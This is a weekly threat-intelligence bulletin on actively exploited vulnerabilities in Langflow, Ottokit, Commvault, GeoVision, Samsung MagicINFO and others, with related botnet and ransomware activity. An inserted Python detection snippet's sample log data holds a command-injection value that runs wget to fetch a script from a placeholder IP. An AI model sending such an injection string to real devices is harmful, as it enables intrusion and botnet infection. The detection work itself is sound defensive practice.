Executive Summary
Recent exploitation patterns reveal a sharp shift toward targeting vulnerabilities in widely used business infrastructure. A total of six vulnerabilities have been added to the CISA KEV catalog this week, spanning a wide range of technologies and platforms. Among them are two flaws in end-of-life (EOL) GeoVision devices, alongside critical issues affecting Commvault Command Center, Langflow, the Yii PHP framework, and the FreeType library. Compounding the urgency, active exploitation has been observed in the wild for critical vulnerabilities in the Ottokit WordPress Plugin and the Samsung MagicINFO 9 Server, both of which are widely deployed and internet-facing. These developments stress the importance of proactive patching and the isolation or retirement of unsupported systems.
Botnet activity surged as malware families like EnemyBot, Sysrv-K, Andoryu, and Androxgh0st exploited security flaws in platforms including Cloud Gateway, GitLab, and various PHP-based systems. At the same time, IoT-focused threats such as Bashlite, BrickerBot, Tsunami, and Mirai intensified their targeting of Eir D1000 modems, accelerating the expansion of their botnet infrastructures.
Threat actors are actively exploiting vulnerabilities in outdated and unpatched systems to deploy Mirai botnet variants and carry out targeted attacks. Discontinued GeoVision IoT devices have been compromised to support Mirai-powered DDoS activity, while a critical flaw in Samsung MagicINFO 9 Server is also being leveraged to deliver the same malware. Additionally, a recently patched Windows vulnerability has been exploited as a zero-day by threat actors linked to the Play ransomware group in a targeted attack on a U.S.-based organization.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping organizations make informed decisions.
CVE-2025-3248
A Missing Authentication Vulnerability in Langflow has been identified in the /api/v1/validate/code endpoint, allowing unauthenticated remote attackers to execute arbitrary code by sending specially crafted HTTP requests. This flaw, rated 9.8 (critical) in severity, affects all Langflow versions prior to 1.3.0. The issue has been resolved in version 1.3.0. As per data from Censys, more than 470 Langflow instances are currently exposed to the internet, with the majority located in the United States, Germany, Singapore, India, and China. However, it remains uncertain how many of these systems have been updated to the patched version, raising concerns over potential exploitation. The availability of a public proof-of-concept and the recent inclusion of this vulnerability in the CISA Known Exploited Vulnerabilities (KEV) catalog further emphasize the urgency of mitigation.
CVE-2025-27007
An Unauthenticated Privilege Escalation Vulnerability in the Ottokit WordPress Plugin (formerly known as SureTriggers) allows remote attackers to gain full administrative control of affected websites without authentication. With a CVSS score of 9.8 (critical), it impacts plugin versions up to and including 1.0.82. This flaw stems from the create_wp_connection function, which is accessible via the plugin's REST API endpoint /wp-json/sure-triggers/v1/connection/create-wp-connection. Due to improper handling of authentication responses and inadequate token validation, attackers can exploit this endpoint by knowing only the administrator's username. Disclosed through the Patchstack Zero Day bug bounty program, active exploitation was observed within an hour of its public disclosure. Wordfence has since released a patched version, 1.0.83, and reported that its firewall has already blocked over 2,400 exploit attempts targeting this vulnerability.
CVE-2025-27363
An Out-of-Bounds Write Vulnerability in FreeType, an open-source font rendering library, arises when parsing font subglyph structures associated with TrueType GX and variable font files. This flaw may permit local arbitrary code execution without requiring elevated privileges. With a high CVSS score of 8.1, this vulnerability poses a significant threat, especially given its confirmed exploitation in the wild, first reported by Facebook in March 2025. Google addressed the issue in its May 2025 Android security updates. The vulnerability has also been recently added to the CISA KEV catalog, underscoring the need for timely patching across affected systems.
CVE-2025-34028
A Path Traversal Vulnerability in the Commvault Command Center allows remote unauthenticated attackers to execute arbitrary code on affected systems. This critical flaw carries the maximum CVSS score of 10 and impacts versions 11.38.0 through 11.38.19. The issue has been addressed in patched releases 11.38.20 and 11.38.25. Security firm watchTowr publicly disclosed technical details and released a proof-of-concept (PoC) exploit for the vulnerability, significantly increasing the risk of exploitation. Within a week of this disclosure, CISA added this vulnerability to its KEV catalog, reinforcing the need for immediate remediation.
CVE-2024-6047
An OS Command Injection Vulnerability affecting GeoVision devices enables a remote, unauthenticated attacker to inject and execute arbitrary system commands. With a critical CVSS score of 9.8, this flaw poses a severe risk to exposed systems. Notably, the impacted GeoVision products have reached end-of-life (EOL) and no longer receive security updates, further compounding the threat. Akamai reports that this is the first observed instance of active exploitation since the vulnerability's initial disclosure in June 2024. The vulnerability has been recently added to the CISA KEV catalog, acknowledging the exploitation activity and emphasizing the need for organizations to decommission or isolate vulnerable devices from accessible networks.
CVE-2024-7399
A Path Traversal Vulnerability in the server component of Samsung MagicINFO 9 allows attackers to write arbitrary files with system-level privileges. With a high CVSS score of 8.1, this issue affects versions prior to 21.1050.0, and Samsung addressed it in August 2024 with the release of MagicINFO version 21.1050. While no exploitation was initially reported at the time of disclosure, the release of a technical analysis and proof-of-concept exploit on April 30, 2025, triggered rapid exploitation in the wild. This surge in activity has significantly increased the risk to unpatched deployments, highlighting the urgency of applying the fix.
CVE-2024-11120
An OS Command Injection Vulnerability in GeoVision devices allows remote, unauthenticated attackers to execute arbitrary system commands. With a critical CVSS score of 9.8, this flaw represents a significant threat to unpatched or exposed systems. Notably, the impacted GeoVision products have reached end-of-life (EOL) and no longer receive security updates, further compounding the threat. According to Akamai, active exploitation of this vulnerability has now been detected for the first time since its initial disclosure in November 2024. The vulnerability has been recently added to the CISA KEV catalog, urging organizations to either decommission the impacted devices or ensure they are properly isolated from accessible networks to prevent compromise.
CVE-2024-58136
An Improper Protection of Alternate Path Vulnerability in the Yii PHP Framework could allow remote attackers to execute arbitrary code. With a critical CVSS score of 9.0, this vulnerability affects versions prior to 2.0.52 and may impact other products built on Yii, such as Craft CMS. The vulnerability was exploited as a zero-day, with attackers chaining it with another flaw, CVE-2025-32432, to gain unauthorized access to servers. It has since been patched in 2.0.52. Due to confirmed exploitation in the wild, it has also been added to the CISA KEV catalog, highlighting the immediate need for remediation.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section identifies vulnerabilities exploited by botnets, including recent CVEs logged in MISP, and presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as the use of wget with raw IP addresses.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is studied by an analyst and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
According to the Symantec Threat Hunter Team, a recently patched Windows vulnerability, CVE-2025-29824, was exploited as a zero-day by threat actors linked to the Play Ransomware group in a targeted attack against an undisclosed U.S.-based organization. This flaw, found in the Common Log File System (CLFS) driver, is a privilege escalation vulnerability that was addressed by Microsoft in a recent security update.
Although no ransomware payload was observed in the attack, the intruders deployed Grixba, a custom infostealer tool tied to the Balloonfly group, known for operating the Play Ransomware. Balloonfly has been active since at least mid-2022, carrying out attacks on businesses and critical infrastructure across North America, South America, and Europe.
CVE-2024-6047 and CVE-2024-11120
In early April 2025, Akamai's Security Intelligence Response Team (SIRT) identified exploit activity targeting the /DateSetting.cgi endpoint across its honeypot network. The attack leverages two command injection vulnerabilities, CVE-2024-6047 and CVE-2024-11120, in discontinued GeoVision IoT devices, specifically exploiting the szSrvIpAddr parameter to execute arbitrary commands without authentication. Although these vulnerabilities were initially disclosed in mid and late 2024, technical details were sparse, and no active exploitation had been publicly reported until now. Attackers are leveraging this flaw to deploy an ARM-based Mirai variant called LZRD, which identifies itself via a unique console string and exhibits traits typical of other Mirai strains.
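As an added illustration (not part of this report or of any vendor's tooling), the detection logic below triages constructed sensor lines against the indicators this report names: the GeoVision /DateSetting.cgi endpoint and its szSrvIpAddr parameter, the Ottokit and Langflow endpoints, and wget fetches from raw IP addresses as the botnet marker described under "Vulnerabilities abused by Botnet". The "METHOD PATH[?QUERY] [BODY]" line format, the tag names, and the sample lines (TEST-NET addresses) are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Endpoints named in this report, mapped to the CVE(s) the report ties to them.
WATCHED_ENDPOINTS = {
    "/DateSetting.cgi": "CVE-2024-6047/CVE-2024-11120 (GeoVision)",
    "/wp-json/sure-triggers/v1/connection/create-wp-connection": "CVE-2025-27007 (Ottokit)",
    "/api/v1/validate/code": "CVE-2025-3248 (Langflow)",
}
# Heuristics: szSrvIpAddr should only ever hold a plain IPv4 address, so anything else is
# suspect (allowlist, not a blocklist of metacharacters); a wget fetch from a bare IPv4
# address is the botnet-style payload marker this report uses.
IPV4_ONLY = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
WGET_RAW_IP = re.compile(r"\bwget\b.*?https?://\d{1,3}(?:\.\d{1,3}){3}", re.IGNORECASE)

# Constructed sample sensor lines ("METHOD PATH[?QUERY] [BODY]"), not real telemetry.
SAMPLE_LOGS = [
    "POST /DateSetting.cgi szSrvIpAddr=%3Bwget+http%3A%2F%2F203.0.113.10%2Farm.sh%3B",
    "POST /DateSetting.cgi szSrvIpAddr=192.0.2.44",
    "POST /wp-json/sure-triggers/v1/connection/create-wp-connection",
    "POST /api/v1/validate/code",
    "GET /index.html",
]

def params_of(encoded):
    # Decode form/query data by hand so only '&' separates pairs (';' stays inside values).
    out = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            out[unquote_plus(key)] = unquote_plus(val)
    return out

def triage(line):
    """Return the indicator tags one sensor line matches (empty list = nothing of note)."""
    parts = line.split(" ", 2) + ["", ""]          # pad so short lines still unpack
    url, body = urlsplit(parts[1]), parts[2]
    tags = []
    if url.path in WATCHED_ENDPOINTS:
        tags.append("watched-endpoint:" + WATCHED_ENDPOINTS[url.path])
    params = params_of(url.query)
    params.update(params_of(body))              # body parameters override query ones
    if url.path == "/DateSetting.cgi" and "szSrvIpAddr" in params:
        if not IPV4_ONLY.match(params["szSrvIpAddr"]):
            tags.append("szSrvIpAddr-not-plain-ipv4")
    if WGET_RAW_IP.search(unquote_plus(line)):
        tags.append("botnet-style-wget-raw-ip")
    return tags
```

A hit on a watched endpoint alone is worth a review of the asset's patch level; a line that also carries the szSrvIpAddr or wget tag is an exploitation attempt and should be escalated.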
Active exploitation has been observed targeting Samsung MagicINFO 9 Server, following a recent alert from the SANS Technology Institute. The vulnerability, an unauthenticated remote code execution flaw, allows attackers to write arbitrary files with system authority, enabling the deployment of the Mirai botnet on compromised systems. To mitigate the risk of exploitation and ensure operational integrity, users are strongly advised to upgrade their Samsung MagicINFO 9 Server instances to version 21.1050 or newer.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/05/07/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.security.com/threat-intelligence/play-ransomware-zero-day
- https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched/
- https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
- https://isc.sans.edu/diary/31920
- https://www.cisa.gov/news-events/alerts/2025/05/02/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow